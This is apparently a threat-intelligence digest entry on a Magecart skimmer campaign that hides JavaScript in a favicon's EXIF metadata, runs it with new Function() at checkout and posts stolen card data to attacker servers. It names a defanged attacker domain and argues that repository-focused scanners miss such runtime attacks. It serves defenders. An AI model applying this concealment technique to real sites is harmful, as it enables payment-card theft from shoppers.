Magecart skimmer leverages favicon EXIF steganography in web supply chain attack chain
Summary
Hide ▲
Show ▼
A recently observed Magecart skimmer employs a three-stage loader chain that conceals its malicious payload within the EXIF metadata of a dynamically loaded favicon, executing entirely in the browser during checkout without ever residing in the merchant’s source code or repository. The attack abuses third-party CDN-hosted resources (legitimate-looking favicon paths) and leverages JavaScript obfuscation and dynamic script injection to retrieve and decode the payload from binary image data. Stolen payment data is exfiltrated directly from the victim’s browser to attacker-controlled infrastructure. This campaign highlights the operational blind spot of repository-centric static analysis tools, which cannot detect threats injected into third-party assets or embedded in runtime-executed binary metadata. The technique underscores the need for continuous client-side runtime monitoring as a critical control layer for web supply chain attacks.
Timeline
-
18.03.2026 13:58 1 articles · 3h ago
Magecart skimmer campaign abuses favicon EXIF steganography to evade static analysis
A Magecart skimmer campaign was identified using a three-stage loader chain that hides its payload in the EXIF metadata of a favicon hosted on an attacker-controlled CDN endpoint. The payload is retrieved at runtime, decoded from binary image data, and executed in the browser via new Function(), with exfiltration occurring directly to attacker infrastructure. The technique targets the blind spot of repository-centric static analysis tools and requires client-side runtime monitoring for detection.
Show sources
- Claude Code Security and Magecart: Getting the Threat Model Right — thehackernews.com — 18.03.2026 13:58
Information Snippets
-
The initial loader dynamically fetches a script from a URL masquerading as a legitimate Shopify CDN endpoint.
First reported: 18.03.2026 13:581 source, 1 articleShow sources
- Claude Code Security and Magecart: Getting the Threat Model Right — thehackernews.com — 18.03.2026 13:58
-
The fetched script constructs an obfuscated URL using index arrays, which decodes to a malicious favicon hosted at b4dfa5[.]xyz/favicon.ico.
First reported: 18.03.2026 13:581 source, 1 articleShow sources
- Claude Code Security and Magecart: Getting the Threat Model Right — thehackernews.com — 18.03.2026 13:58
-
The favicon is retrieved as binary data, parsed for EXIF metadata containing a malicious JavaScript string, and executed via new Function().
First reported: 18.03.2026 13:581 source, 1 articleShow sources
- Claude Code Security and Magecart: Getting the Threat Model Right — thehackernews.com — 18.03.2026 13:58
-
Exfiltration occurs via POST requests to attacker-controlled servers, sending stolen payment data directly from the victim’s browser.
First reported: 18.03.2026 13:581 source, 1 articleShow sources
- Claude Code Security and Magecart: Getting the Threat Model Right — thehackernews.com — 18.03.2026 13:58
-
The attack chain does not require any modification to the merchant’s source code or repository, relying entirely on runtime execution in the browser.
First reported: 18.03.2026 13:581 source, 1 articleShow sources
- Claude Code Security and Magecart: Getting the Threat Model Right — thehackernews.com — 18.03.2026 13:58
-
Claude Code Security and similar repository-centric static analysis tools have no visibility into payloads injected into third-party CDN assets or hidden within binary metadata.
First reported: 18.03.2026 13:581 source, 1 articleShow sources
- Claude Code Security and Magecart: Getting the Threat Model Right — thehackernews.com — 18.03.2026 13:58